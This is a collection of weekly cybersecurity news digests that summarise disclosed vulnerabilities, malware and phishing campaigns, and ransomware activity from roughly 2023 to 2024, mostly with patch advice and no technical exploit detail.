WakeUp Wednesday

CrushFTP warns users about a critical vulnerability that is currently being actively exploited by malicious actors. By exploiting the vulnerability, an unauthenticated attacker can move outside the virtual file system (VFS) and download system files. Systems that use a DMZ perimeter network for their CrushFTP instance are not currently vulnerable. Patches are available.

Furthermore, Palo Alto has published an update regarding the vulnerability in Palo Alto PAN-OS. The vulnerability is a combination of two flaws in the PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 versions of the software. The first is not sufficiently validating the session ID format before it was saved by the GlobalProtect service. This allowed an attacker to save an empty file with a file name chosen by the attacker. The second relied on the files being generated by the system and then using those file names as part of a command.

A vulnerability in GitHub is being exploited by malicious parties to spread malware. This distribution takes place via URLs associated with a Microsoft repository, making the files appear trustworthy. While most of the malware activity is based on the Microsoft GitHub URLs, this capability can be exploited with any public repository on GitHub.

Currently, Lastpass users are actively being approached by malicious parties with a telephone phishing (voice phishing) campaign in an attempt to steal their login details. After telephone contact with a person posing as a helpdesk employee, an email is sent to the victim with a link that refers to a phishing site. When the Lastpass user enters his details here, the malicious party will try to log in with these details and adjust the settings. According to Lookout researchers, this attack uses CryptoChameleon, advanced software that is also associated with crypto theft.

Palo Alto has released patches for a critical vulnerability in the PAN-OS GlobalProtect Gateway. The vulnerability (CVE-2024-3400, CVSSv4 score 10) allows an unauthenticated attacker to remotely execute arbitrary code and is currently being actively exploited. The patches currently available are updates for versions PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1 and PAN-OS 11.1.2-h3. Patches for other versions are expected shortly. A T-Update was recently published about this, more information can be found in our blog.

Telegram recently patched a zero-day vulnerability in its Windows desktop application. Exploiting this vulnerability allowed an attacker to bypass security warnings and automatically launch Python scripts. Currently this vulnerability has been addressed by adding the .untrusted extension to pyzw files on the server side, which when clicked causes Windows to ask which program you want to use to open these files, instead of automatically starting in Python .

Phylum researchers have discovered that “test files” related to the vulnerability in XZ Utils (liblzma-sys) have also been found in a Rust crate. Liblzma-sys, which has been downloaded more than 21,000 times to date, provides Rust developers with connections to the liblzma implementation, an underlying library that is part of the XZ Utils data compression software. The affected version in question is 0.3.2. The test files themselves are not included in the .tar.gz nor the .zip tags on GitHub and are only present in liblzma-sys_0.3.2.crate installed from Crates.io.

Finally, the Rust project has released an update to its standard library. This comes after it was revealed that a specific function used to run batch files on Windows systems could be exploited via an injection flaw. The set of common features of the Rust programming language, known as the Standard Library, provides the ability – among many other capabilities – to run Windows batch files via the Command API. However, the function did not process the input to the API strictly enough and did not prevent the possibility of injecting code into the execution.

Approximately 16,500 Ivanti Connect Secure and Poly Secure gateways that connect to the public Internet are likely vulnerable to a Remote Code Execution (RCE) vulnerability. The vulnerability is registered as CVE-2024-21894 and involves a severe heap overflow in the IPSec component of Ivanti Connect Secure 9.x and 22.x. By exploiting this vulnerability, attackers could potentially cause Denial of Service (DoS) or achieve RCE by sending specially crafted requests.

More than 92,000 D-Link NAS devices are vulnerable to arbitrary command injection and a hardcoded backdoor that, when combined, could allow an attacker to remotely execute code on the device. The vulnerability is registered as CVE-2024-3273. No patches are available because the vulnerable devices are in End Of Life (EOL) status. The advice is to replace the devices with newer types. If that is not possible, it is recommended to at least install the latest available updates.

Proofpoint researchers, together with the Team Cymru research team, investigated Latrodectus malware. Latrodectus is a downloader whose purpose is to download payloads and execute arbitrary commands. This malware was believed to be an evolved version of IcedID-loader. Further analysis revealed that Latrodectus is new malware that, based on the characteristics of the analyzed sample and the functionality of the malware, was written by the same developers as IcedID.

Wiz research has found that AI-as-a-Service providers are susceptible to two major risks that could allow adversaries to escalate their privileges, gain cross-tenant access to other customers’ models, and even compromise CI/ can take over CD pipelines. For example, malicious parties can take over the CI/CD pipeline to carry out a supply chain attack.

Adversaries have used Facebook ads and hijacked pages to promote fake AI services such as MidJourney, OpenAI’s SORA and ChatGPT-5, and DALL-E. The purpose of these ads and pages is to infect unsuspecting users with password-stealing malware. Users tricked by the ads join fraudulent Facebook communities. However, the community posts often promote temporary access to upcoming and highly anticipated AI services, tricking users into downloading malicious executables that infect Windows computers with infostealers such as Rilide, Vidar, IceRAT, and Nova.

Red Hat warns of a code injection vulnerability in XZ Utils, the compression utility for the XZ format included in Unix-like operating systems such as Linux. The vulnerability (CVE-2024-3094 with a CVSS score of 10.0) affects two versions of Fedora Linux 40 beta, version 5.6.0 and version 5.6.1, and Fedora Rawhide. The code injection (CVE-2024-3094) injects code into the authentication process that allows malicious actors to gain remote access to the system. Users are advised to downgrade the tool to a more secure version or disable SSH completely. More information about this vulnerability can be read in our blog.

Cisco warns of password-spraying attacks on VPN services. These initially targeted firewalls and SSLVPN devices from Fortinet, Palo Alto, WatchGuard, SonicWall and Cisco, but have been expanded to include web apps that use Active Directory for authentication. Cisco has published mitigating measures. According to a researcher, based on, among other things, the attack pattern, the attacks appear to be related to the Brutus botnet.

Apple macOS users are currently being targeted by two different infostealer variants. Both have the same goal, which is to steal sensitive user information. The info stealers are spread via fake websites and malicious advertisements. One of the attack chains targets users who search for ARc Browser via search engines such as Google and are then presented with a rogue ad. This advertisement then directs the user to similar sites offering the malware. The fake site cannot be accessed directly, but can only be accessed via a generated sponsored link.

A vulnerability in the wall command of the util-linux package that is part of the Linux operating system could allow an unauthorized attacker to steal passwords or modify the victim’s clipboard. The vulnerability is registered as CVE-2024-28085, is called WallEscape and has been present in every version of the package for the past 11 years, up to and including 2.40 which was released yesterday.

Researchers at the National Cyber Security Center (NCSC) in the UK have published a proof-of-concept (PoC) exploit for a critical vulnerability in Fortinet’s FortiClient Enterprise Management Server (EMS) software that is currently being actively exploited. This vulnerability (CVE-2023-48788, with a CVSS score of 9.3) affects FortiClient EMS versions 7.0 (7.0.1 through 7.0.10) and 7.2 (7.2.0 through 7.2.2). Patches are available, the advice is to install them as soon as possible.

Tenable researchers have published details about a now patched vulnerability in Amazon Web Services (AWS) Managed Workflows for Apache Airflow (MWAA). By exploiting this vulnerability, an attacker could hijack sessions and execute remote code on the underlying instances.

Finally, information about a new series of StrelaStealer phishing attacks. StrelaStealer focuses on stealing credentials from Outlook email accounts, among others. Researchers from Unit 42 indicate that this wave of attacks is impacting more than 100 organizations in both the EU and the US. In an attempt to avoid detection, the malicious actors change the initial file format of the email attachments. Instead of the previously used ISO files, ZIP files are now used and, among other things, PDB strings are removed to evade detection by tools that use static signatures.

G Data researchers have found a number of GitHub repositories offering cracked software used to deliver RisePro infostealer. This infostealer has new string encryption and a custom MSI installer that crashes reversal programs like IDA. The campaign includes at least 13 repositories linked to 11 different accounts. The repositories in question have now been removed.

In addition, Netskope researchers have discovered that malicious parties are spreading the infostealer AXORult via rogue Google sites. This uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on a third-party website.

Research by IBM X-Force shows that the Russia-linked threat actor APT28 can be linked to several active phishing campaigns. These campaigns use documents that resemble those of several organizations and government institutions in Europe, among others. These documents are a mix of internal and publicly available documents, as well as possible documents generated by the malicious actor. The documents relate to finance, critical infrastructure, cybersecurity, maritime security and healthcare, among others. Other actions by this attacker involve exploiting vulnerabilities in Microsoft Outlook, including CVE-2023-23397, with a CVSS score of 9.8.

Cyble researchers say they saw an increase in attempts to exploit CVE-2024-23334 by ransomware group ShadowSyndicate in March. The vulnerability concerns a directory traversal vulnerability located in the aiohttp Python library. Aiohttp is an open source library built on top of Python’s asynchronous I/O framework, Asyncio.

Magnet Goblin is a financially motivated hacking group that quickly exploits 1-day vulnerabilities to compromise Internet-accessible servers and install malware. They take advantage of the time between the supplier publishing a patch for a vulnerability and the actual patching of the vulnerability by organizations. Check Point has analyzed their tactics and warns about their quick response time to new Proof of Concepts (PoCs). In some cases, vulnerabilities are already exploited the day after a Proof of Concept is published.

Cisco has released patches to resolve a vulnerability in its Secure Client software. The vulnerability, CVE-2024-20337, has a CVSS score of 8.2 and allowed an attacker to perform a Carriage Return Line Feed (CRLF) injection attack on a user. Successfully exploiting the vulnerability could allow an attacker to execute arbitrary script code in the browser or access sensitive, browser-based information.

QNAP warns of vulnerabilities in its NAS software products. The vulnerabilities (CVE-2024-21899, CVE-2024-21900, and CVE-2024-21901) impact several versions of QNAP operating systems, including QTS 5.1.x, QTS 4.5.x, QuTS hero h5.1.x , QuTS hero h4.5.x, QuTScloud c5.x and the myQNAPcloud 1.0.x service. Exploiting the vulnerabilities could allow attackers to gain access to these devices. The vulnerabilities concern an authentication bypass, command injection and SQL injection. Patches have been made available by QNAP.

Technical details and a proof-of-concept (PoC) exploit have been made available for a recently disclosed critical vulnerability in Progress Software OpenEdge Authentication Gateway and AdminServer. Adversaries can exploit this vulnerability to bypass authentication protections. The vulnerability, CVE-2024-1403, has a CVSS score of 10. This vulnerability affects OpenEdge versions 11.7.18 and earlier, 12.2.13 and earlier, and 12.8.0.

Avast research shows that hacker group Lazarus is exploiting the recently patched privilege escalation flaw in the Windows kernel to gain access at the kernel level. After gaining access, they can disable the security software on the compromised systems. The exploited vulnerability is CVE-2024-21338 with a CVSS score of 7.8. Exploitation of this vulnerability can allow an attacker to gain system privileges. The vulnerability was fixed earlier this month as part of the Patch Tuesday updates.

Research by JPCERT/CC shows that Lazarus uploaded four packages to the Python Package Index (PyPI) repository, with the aim of infecting development systems with malware. The packages have now been removed. These are pycryptoenv, pycryptoconf, quasarlib and swapmempool. These have together been downloaded 3,269 times, with pycryptoconf accounting for the most downloads with 1,351. The package names pycryptoenv and pycryptoconf are similar to pycrypto, a Python package used for encryption algorithms in Python.

Security vendor JFrog has discovered 100 malicious artificial intelligence (AI)/machine learning (ML) models in the Hugging Face platform. These models also include cases where loading a pickle file leads to code execution. The model’s payload gives the attacker a shell on the compromised system, allowing them to take full control of their victims’ machines.

ConnectWise has fixed vulnerabilities in ScreenConnect. ScreenConnect is remote support software that provides remote access to internal systems. An unauthorized attacker can exploit these vulnerabilities to create a new administrator account and/or initiate remote code execution, with all the associated risks. More information about the vulnerabilities and the measures to be taken can be found in our blog.

Researchers are currently seeing a spike in email phishing campaigns that abuse the Google Cloud Run service to spread various banking Trojans in Europe and elsewhere. Researchers at Cisco Talos revealed that the infection chains associated with these malware families use malicious Microsoft Installers (MSIs) that act as droppers or downloaders for the final malware payload(s).

The malicious parties behind ransomware group LockBit are active again. Last week, much of the infrastructure was put on hold by law enforcement agencies. Because the backups were not affected by the authorities, LockBit is now back with a new infrastructure and a new .onion address for publishing victims.

We believe it is important to inform organizations about trends and developments in the field of cybersecurity. Tesorion is one of the participants in the Project Melissa partnership, which was founded in the fight against ransomware attacks. Last week, Project Melissa presented the report ‘Jaarbeeld Ransomware 2023‘. This Annual Report provides insight into ransomware attacks in the Netherlands and was drawn up with anonymized data provided by affiliated cybersecurity companies, the police, the Public Prosecution Service and the NCSC. This annual report shows, among other things, that 58 percent of Dutch victims did not have a backup.

Fortinet recently published two advisories. The first describes CVE-2024-21762. This vulnerability allows an unauthenticated, remote attacker to execute arbitrary code via the FortiOS SSL VPN interface using specifically crafted requests. In the second Advisory, CVE-2024-23113 is described. This vulnerability in the FortiOS FortiGate-to-FortiManager (FGFM) interface could also allow an unauthenticated, remote attacker to execute arbitrary code or commands via specially crafted requests. Both vulnerabilities have a CVSS score of 9.8 and are already being exploited in the wild. No public exploit code is currently available for any of the vulnerabilities. More information is available via the blog.

Ivanti has released a new vulnerability that affects Connect Secure, Policy Secure and ZTA gateways. This new vulnerability, CVE-2024-22024, has a CVSS score of 8.3. This vulnerability allows attackers to access protected resources without authentication. There is no indication that this vulnerability is currently being exploited, unlike previously published vulnerabilities CVE-2023-46805, CVE-2024-21887 and CVE-2024-21893. The January 31 mitigation also provides protection against CVE-2024-22024, and patches are now available. We recommend installing these patches as soon as possible.

New macOS malware written in Rust is currently being distributed. This pretends to be a Visual Studio Update. The malware, called RustDoor, provides a backdoor to affected systems. RustDoor can run on Intel-based (x86_64) and ARM (Apple Silicon) architectures, say researchers at cybersecurity firm Bitdefender. The macOS backdoor is offered under various names, including ‘zshrc2,’ ‘Previewers,’ ‘VisualStudioUpdater,’ ‘VisualStudioUpdater_Patch,’ ‘VisualStudioUpdating,’ ‘visualstudioupdate,’ and ‘DO_NOT_RUN_ChromeUpdates’. The malware contains a wide range of commands to upload files, collect files and collect information about the endpoint, among other things.

We start this WakeUp Wednesday with the attack on software company AnyDesk. AnyDesk, maker of remote desktop software, indicates that a security audit revealed that production systems have been compromised. All security-related certificates have been revoked and the systems have been repaired or replaced where necessary. The code signing certificate for the binaries will also soon be revoked and replaced by a new copy. As a precaution, the passwords for the web portal have also been revoked and users are asked to change the password there if they use the same password in other places as well.

Snyk researchers have discovered four critical vulnerabilities in container engine components. These four vulnerabilities (CVE-2024-21626, CVE-2024-23651, CVE-2024-23653 and CVE-2024-23652) together are called ‘Leaky Vessels’. The vulnerability requiring most urgent attention is CVE-2024-21626, with a CVSS score of 8.6. This vulnerability impacts runC, the lightweight container runtime for Docker and other container environments. Exploiting this vulnerability could allow an attacker to gain unauthorized access to the underlying host operating system and potentially anything else running on the same host. The Buildkit, runc and Dockers have released an update that fixes the vulnerabilities. CISA encourages cloud system administrators to quickly take appropriate measures to prevent exploitation of the vulnerability.

A critical vulnerability in the social media network Mastodon allows Mastodon accounts to be taken over remotely. The vulnerability, CVE-2024-23832, has a CVSS score of 9.4. A security update has now been released to resolve the vulnerability. Technical details about the vulnerability will be released on February 15. This gives administrators the opportunity to install the available update before the details are known and the risk of exploitation increases.

Cisco has announced that its Unified Communications and Contact Center Solutions products are vulnerable to a critical vulnerability (CVE-2024-20253). This vulnerability allows an attacker to remotely execute code and gain root access to the affected device. The vulnerability has a CVSS score of 9.9. We recommend installing the available patches as soon as possible.

Fortinet researchers have discovered new malicious malware packages in the open-source Python Package Index (PyPI). The malware infects Windows systems with an infostealer called WhiteSnake Stealer. These malware packages are called nigpal, telerer, seGMM, myGens, NewGends and TestLibs111. Depending on the operating system of the victims’ devices, the malware is executed when the aforementioned Python packages are installed.

Two weeks ago, our WakeUp Wednesday covered two critical vulnerabilities in GitLab (CVE-2023-7028) and (CVE-2023-5356). GitLab is now once again warning of a vulnerability (CVE-2024-0402) that could allow an authenticated attacker to write files to arbitrary locations on the GitLab server when creating a workspace. The vulnerability has a CVSS score of 9.9 and is fixed in GitLab 16.6.6, 16.7.4, and 16.8.1. In addition, the solution has also been implemented in version 16.5.8. We recommend installing the update as soon as possible.

Finally, the AIVD warns against the use of Quantum Key Distribution (QKD). This method of exchanging encryption keys would be insecure because there is no guarantee that the quantum channels will not be eavesdropped or manipulated by third parties. According to the AIVD, the QKD technology is unusable in most cases because there are various limitations in applying the technology. For example, special hardware is required and there is a limited range because QKD systems use a direct fiber optic connection or light signals. The range is therefore no greater than a few hundred kilometers.

An increase in attacks has been noted that exploit the Ivanti Connect Secure and Ivanti Policy Secure vulnerabilities. These vulnerabilities allow attackers to gain access to sensitive information and systems. The latest information regarding these vulnerabilities (CVE-2023-46805 and CVE-2024-21887) can be found in our blog. There are currently no security updates available, but it is possible to take mitigating measures to reduce the risk. Our blog also includes Ivanti’s schedule for releasing the security updates.

Another serious threat is the Apache ActiveMQ (CVE-2023-46604) vulnerability, which is actively exploited by several cyber criminals. The vulnerability in Apache Active MQ allows remote code execution. Since this vulnerability was disclosed, it has been actively exploited by multiple malicious actors to deploy ransomware, rootkits, cryptocurrency miners, and DDoS botnets. Researchers at Trustwave see a new Godzilla web shell that disguises itself as an unknown binary format and thus evades detection by security solutions. A patch is available for CVE-2023-46604, it is recommended to install it as soon as possible.

Finally, a warning about an old, but still effective attack technique: abusing TeamViewer to spread ransomware. According to a report from Huntress, it appears that ransomware groups are still using this method to gain access to devices and then deliver their malicious payload. In many cases, this abuse can be prevented by using strong passwords, enabling multi-factor authentication and using TeamViewer only where and when necessary.

Ivanti Connect Secure VPN contains two vulnerabilities that together pose a serious threat to the security of the system. The first vulnerability (CVE-2023-46805) allows authentication to be bypassed and access to the system without valid credentials. The second vulnerability (CVE-2024-21887) allows commands to be injected and executed on the system. An attacker can manipulate or take over the system’s configuration, files and network connections. It is therefore important to install available updates or restrict access to the system as soon as possible.

Juniper Networks SRX series firewalls and EX series switches have a critical vulnerability (CVE-2024-21591) in the J-Web configuration tool. This vulnerability has a CVSS score of 9.8 and allows remote code execution on the devices without authentication. An attacker can gain root privileges, disable the device, or perform Denial-of-Service (DoS) attacks. It is highly recommended to install the security updates or upgrade JunOS to the latest version. If that is not possible, as a workaround one can disable the J-Web configuration tool or limit access to it to only the trusted network hosts.

GitLab Community and Enterprise have two critical vulnerabilities that allow account hijacking. The first vulnerability (CVE-2023-7028) has a CVSS score of 10 and allows account takeover without user interaction. The second vulnerability (CVE-2023-5356) has a CVSS score of 9.6 and allows exploiting Slack/Mattermost integrations to execute slash commands as a different user. It is recommended to install the updates as soon as possible.

A new remote code execution vulnerability has been discovered in Apache Rocket MQ NameServer, which was not resolved by the previous patch. This vulnerability, CVE-2023-37582, allows attackers to execute arbitrary code on affected servers. The recommended solution is to upgrade the NameServer to version 5.1.2/4.9.7.

Three malicious Python packages have been found in the open source Python Package Index (PyPI) repository, which crypto miners can install on Linux devices. The packages, modularseven, driftme and catme, are related to a previous campaign that used culturestreak; according to research by Fortinet. The packages have now been removed from PyPI.

Multiple implementations of the Kyber key encapsulation mechanism for quantum-safe encryption are vulnerable to a series of flaws collectively called KyberSlash. These can allow for the possible recovery of secret keys. Kyber is one of the algorithms selected by NIST (National Institute of Standards and Technology) to resist attacks from quantum computers.

Ivanti has released an update to address a remote code execution vulnerability in its Endpoint Management software (EPM). This vulnerability could allow attackers to gain control of registered devices or the server. The vulnerability, registered as CVE-2023-39336, affects all supported Ivanti EPM versions. A patch is available.

Akamai recently released more information about the zero-click Outlook vulnerabilities CVE-2023-35384 and CVE-2023-36710. When these vulnerabilities are combined, cybercriminals could remotely execute code on the Outlook email service without user action. Patches are available for these vulnerabilities.

Lumen Technologies’ Black Lotus Labs team has discovered a new botnet called KV botnet. This botnet abuses SOHO (Small Office Home Office) routers, firewalls and VPN equipment from Cisco, DrayTek, Fortinet and NETGEAR. KV botnet focuses on equipment located at the edge of the network, such as home workers, because these equipment are often a weak link in the cybersecurity of organizations.

Researchers from ESET published a report this week on 116 malware packages found in the Python Package Index (PyPI) Repositories. These malware packages aim to infect Windows and Linux systems with a backdoor. In some cases, the final payload is a variant of the infostealer W4SP Stealer or a simple clipboard monitor to steal cryptocurrency, or both. It is estimated that these packages have been downloaded more than 10,000 times since May 2023.

The Vrije Universiteit Amsterdam has unveiled a new side-channel attack method: SLAM. SLAM allows attackers to steal sensitive information from the operating system kernel memory running on Intel, AMD or Arm CPUs. SLAM is a Spectre-like vulnerability that takes advantage of a new feature in Intel CPUs: Linear Address Masking (LAM). AMD and Arm have similar features: Upper Address Ignore (UAI) and Top Byte Ignore (TBI). LAM should improve security, but it also introduces new vulnerabilities. It increases the Specter attack surface. The following CPUs are vulnerable:

• Existing AMD CPUs (registered as CVE-2020-12965)
• Future Intel CPUs with LAM (both 4 and 5 level paging)
• Future AMD CPUs with UAI and 5-level paging
• Future Arm CPUs with TBI and 5-level paging

Researchers at Elastic Security Labs have discovered that a new functionality has been added to GuLoader malware to make analysis by researchers even more difficult. The Malware-as-a-Service (MaaS) still works the same, but is more difficult to analyze. GuLoader spreads through phishing campaigns. The emails contain a ZIP file or a link to a Visual Basic Script.

Cybercriminals can connect a keyboard to Android, Linux, macOS and iOS devices without permission by exploiting a vulnerability in Bluetooth. They use an authentication bypass to connect to vulnerable devices. Several Bluetooth stacks have this vulnerability. An attacker can thus inject keystrokes without the user’s permission. The vulnerability also works in Apple’s LockDown mode, which is intended to protect against advanced digital threats. The attack is only possible when the device is in pairing mode.

Zyxel released updates last week to patch 15 vulnerabilities in its NAS, Firewall and Access points. Three critical vulnerabilities can lead to an authentication bypass and the ability for a cybercriminal to execute certain operating system commands. In addition, updates have been released for vulnerabilities that could allow a cybercriminal to access system information and execute arbitrary commands.

MalwareHunterTeam reports having discovered one of the most advanced versions of Qilin Ransomware. Unlike many other ransomware groups, Qilin does not use leaked Babuk source code. They build their own encryptors aimed at Linux servers. This new version offers far-reaching options for customizing Linux encryptors. Qilin’s encryptor is built with built-in configuration rules. For example, these specify the extension for encrypted files, the processes to terminate, the files to encrypt or exclude, and the directories to encrypt or exclude. However, it also contains numerous command line arguments that allow extensive customization of these configuration options and the way files are encrypted on a server.

Critical vulnerabilities in the data analytics solution Qlik Sense are currently being exploited by Cactus ransomware. Updates are available for these vulnerabilities. Researchers at Artic Wolf warn that these previously published vulnerabilities are currently being actively exploited by cybercriminals. The attackers use PowerShell and the Background Intelligent Transfer Service (BITS) to download tools and provide remote access to the machine.

OwnCloud’s administrators warn of three critical vulnerabilities. OwnCloud is an open-source file sharing solution. The vulnerabilities can be exploited to disclose sensitive information and modify files. One of the vulnerabilities can reveal the administrator passwords and mail server credentials. Mitigation measures are described in the blog. In addition, it is recommended to update the libraries as soon as possible.

ESET research has revealed more details about a rogue Telegram bot called Telekopye. Telekopye can create phishing websites, emails, and text messages, among other things. The actors behind this operation have been given the name Neanderthals. The operation focuses on three types of scams. Selling non-existent goods, tricking people into entering financial details remotely and thus cheating them out of money and refund scams.

Email messages with themes surrounding the delivery or shipping of goods are currently being used to distribute WailinCrab malware. This malware is split into several components, including a loader, injector and a backdoor, according to research by IBM X-Force. WailinCrab is also called WikiLoader. The malware is actively maintained and includes functionality to reduce analysis and detection. One of the ways this is done is by using legitimate, hacked sites for the initial command-and-control (C2) communications. In addition, parts of the malware are stored on well-known platforms, such as Discord.

Play ransomware is currently also offered as ‘Ransomware-as-a-Service’, according to research by Adlumin. They come to this conclusion after analyzing various Play ransomware attacks on organizations in different sectors. Almost identical tactics were used and applied in the same order. There is a lack of even the slightest variations between attacks. For example, the public music folder is used to hide the malicious file and the same password is used to create high-privilege accounts.

The FBI has published an advisory in which it explains the methods of Scattered Spider, a hacker group that collaborates with ransomware group ALPH/BlackCat. Scattered Spider uses phishing, bombarding people with MFA (multi-factor authentication) requests, and SIM swapping to gain access to the networks of large organizations. A recent report from Microsoft, which refers to this group as Octo Tempest, calls them one of the most dangerous, financially motivated groups that do not shy away from violent threats to achieve their goals.

A proof of concept exploit has been released for a critical vulnerability in CrushFTP enterprise suite (CVE-2023-43177). An update is available, but there are currently still 10,000 CrushFTP instances that are publicly accessible. Unfortunately, the update does not address all possible threats, so additional measures are recommended.

Outpost24 has discovered that LummaC2, an infostealer, is equipped with new capabilities to avoid detection. For example, LummaC2 v4.0 is equipped with a cryptor to prevent the raw form of the infostealer from being leaked. In addition, the infostealer uses trigonometry. This mathematical principle is used to evade detection. For this purpose, the technique takes into account different positions of the cursor in a short interval. Most analysis systems cannot realistically emulate mouse movements, which makes detection more difficult.

Cybercriminals regularly use social engineering in the preparation phase of an attack. The FBI recently published advice to provide organizations with tools to prevent ‘callback phishing’. With this form of phishing, the victim receives an email about problems with their account. The email contains a telephone number to call to resolve the problems. Once the victim calls the specified number, they are given these instructions for installing a legitimate management tool. Through that tool, cyber criminals can then install other tools to steal data. This data is then used to extort the organization.

Security researchers from BlackBerry have discovered a Windows variant of the BiBi-Linux Wiper. This wiper malware, called BiBi-Windows Wiper, overwrites the data in the Windows users directory with worthless data and appends .BiBi to the files. In addition to making the files unusable, the wiper removes shadow copies from the system. This makes the damage irreparable. It is not yet known how this BiBi-Windows Wiper is distributed. Currently, the campaign appears to be targeting Israel’s IT and government sectors. However, the groups associated with this wiper have historically attacked different sectors and different geographical locations.

MalwareBytes has discovered a new malvertising campaign. This poses as a legitimate Windows news portal to distribute a malicious installer. In this case it concerns the popular system profiling tool CPU-Z. In addition, other utilities such as Notepad, Citrix and VNC viewer are also abused. The malicious installer contains a PowerShell script, a loader called FakeBat that is used to deploy RedLine Stealer.

For users of Apple devices, the ‘Find My…’ function can be useful. Lost or lost iPhones, iPads, Macs, Apple Watches, AirPods and Apple Tags can be found this way. Lost devices constantly send Bluetooth signals that are detected by nearby Apple devices, which then anonymously report their location to the owner via the ‘Find My‘ network. This service also works when the devices are offline. On the downside, Apple’s “Find My” location network can also be abused by malicious actors to surreptitiously transmit sensitive information captured by keyloggers.

The keylogger does not need to use an AirTag or an officially supported chip because Apple devices are configured to respond to any Bluetooth message. If that message is in the correct format, the receiving Apple device creates a location report and uploads it to the ‘Find My’ network. On the German-language site Heise.de, Positive Security analysts have posted Proof-Of-Concept hardware to illustrate the risk of this functionality.

Atlassian indicates that a public exploit is now available for a critical Confluence vulnerability. This can be used in attacks that aim to destroy data. The attacks target Internet-exposed and unpatched environments. The critical vulnerability, CVE-2023-22518, is a vulnerability that affects all versions of Confluence Data Center and Confluence Server software. There are still no reports of active exploitation. Still, it’s important for administrators to take immediate action to protect the environments in use.

HelloKitty is a ransomware organization whose source code was recently leaked on a Russian-speaking cybercrime forum. This makes it available to everyone. The HelloKitty ransomware uses a recently disclosed vulnerability in Apache ActiveMQ (Remote Code Execution (RCE)) to enter organizations and encrypt data. This vulnerability, CVE-2023-46604, is a Remote Execution Error. By exploiting this vulnerability, attackers can execute arbitrary shell commands. The vulnerability was addressed in a security update on October 25, 2023. However, the threat monitoring service ShadowServer reports that as of October 30, there were still 3,329 Internet-exposed servers running a version vulnerable to exploitation.

Kinsing has a rich history of attacking container environments, often using misconfigured open Docker daemon API ports. Recently, research from cloud security firm Aqua has revealed that threat actors linked to Kinsing are attempting to exploit the recently disclosed Linux privilege escalation flaw called Looney Tunables. This, as part of a “new experimental campaign” designed to enter cloud environments. The development marks the first publicly documented case of active exploitation of Looney Tunables (CVE-2023-4911), which could allow a threat actor to gain root privileges.

The NGINX Ingress controller for Kubernetes contains three critical vulnerabilities (CVE-2022-4886, CVE-2023-5043, and CVE-2023-5044) that could be exploited by a cybercriminal. By exploiting the vulnerabilities, the configuration of the Ingress object can be controlled and the attacker can steal credentials from the cluster. This allows the cybercriminal to inject arbitrary code into the ingress controller process and gain unauthorized access to sensitive data. There is currently no patch available. The developers of the software solutions recommend enabling the “strict-validate-path-type” option and setting the –enable-annotation-validation flag to prevent the creation of Ingress objects with invalid characters and additional restrictions to enforce. Updating NGINX to version 1.19, in addition to adding the “–enable-annotation-validation” command line configuration, resolves two of the vulnerabilities, CVE-2023-5043 and CVE-2023-5044.

Microsoft has noticed that members of the Scattered Spider group are posing as newly hired employees at specific organizations. Through these social engineering-based attacks on support and help desk personnel, cybercriminals attempt to gain initial access to privileged accounts. This includes tricking helpdesk staff into resetting the victim’s password and multi-factor authentication (MFA) methods. Scattered Spider is known as an organization with great operational flexibility and uses tactics such as SMS phishing, SIM swapping and helpdesk fraud.

A new ransomware-as-a-service has been discovered. This has been given the name Hunters International. The discovery was made by malware analyst Rivitna, who discovered the new encryptor. The encryptor contained multiple code overlaps with the code used by the Hive ransomware operation. leading to the valid assumption that the old gang has resumed their activities under a different banner. This statement is partly substantiated because the Hunters International malware was an example of the Hive ransomware version 6.

F5 warns customers of a critical vulnerability impacting BIG-IP. Exploitation of the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system via the management port and/or proprietary IP addresses to execute arbitrary system commands. Cybercriminals can only exploit devices whose Traffic Management User Interface (TMUI) is exposed to the Internet and have no influence on the data plane. However, because the TMUI is often exposed internally, an attacker who has already compromised a network can exploit the flaw. An update is available. If updating is not possible, mitigating measures can be taken.

On October 17, cybersecurity company Mandiant published a blog describing exploitation of vulnerability CVE-2023-4966. This is a critical vulnerability in Citrix ADC and Citrix Gateway. Furthermore, they reveal that session information of active users is leaked when exploiting the vulnerability. This gives an attacker the opportunity to take over sessions. In addition, an attacker can collect additional credentials. More information in our blog.

Researchers have found three critical vulnerabilities in SolarWinds Access Rights Manager (ARM). Cybercriminals can therefore execute code with System user rights. ARM is a tool that allows organizations to manage and audit user rights within their IT environment. A patch is available.

Malvertising (rogue advertisements) remains a point of attention. Malwarebytes recently discovered a Google Ads campaign in which the official domain of KeePass password manager is abused to spread malware. Cybercriminals use Punycode, a way to convert Unicode characters to ASCII. In addition to KeePass, free PDF converters are also advertised, for example.

Research by Uptycs shows that Quasar RAT, an open-source remote access Trojan, uses DLL sideloading. This technique takes advantage of the inherent trust that a DLL gains in a Windows environment. Quasar RAT is a remote administration tool written in C# that can collect system information, a list of running applications, files, keystrokes, screenshots, and more. By using DLL sideloading, the cybercriminal hopes to remain invisible to, for example, siphon data from compromised Windows hosts.

There is an update on the Cisco security advisory. They have added a second vulnerability to the advisory which is registered as CVE-2023-20273. This vulnerability is used to deploy an implant after initial access provided by CVE-2023-20198. Details regarding this implant and how to identify it have been published in the Cisco Security Advisory. Both vulnerabilities (CVE-2023-20198 and CVE-2023-20273) are actively being exploited, and based on research, a significant number of exposed Cisco IOS XE system have the implant running. More info in our blog.

In the period July-September, several attacks with DarkGate malware took place using compromised Skype accounts. According to Trend Micro researchers, these attacks occurred by sending victims a message with a PDF attachment through the compromised accounts. This attachment contains a VBA loader script that then downloads an AutoIP script that produces the final output of the DarkGate malware. Access to the Skype account ensures that the cybercriminal can adjust the text in the chat and the naming of the files so that it fits the conversation history. In addition to Skype, Microsoft Teams chats are also abused to spread this malware.

During the most recent Patch Tuesday, Microsoft released an update for two actively attacked zero days in WordPad and Skype for Business. Exploiting the vulnerability in WordPad gives a cybercriminal the opportunity to steal the NTLM hashes of user accounts. This makes it possible for the system to be taken over. The vulnerability in Skype for Business allows a cybercriminal to obtain sensitive information that can be used to gain access to internal networks.

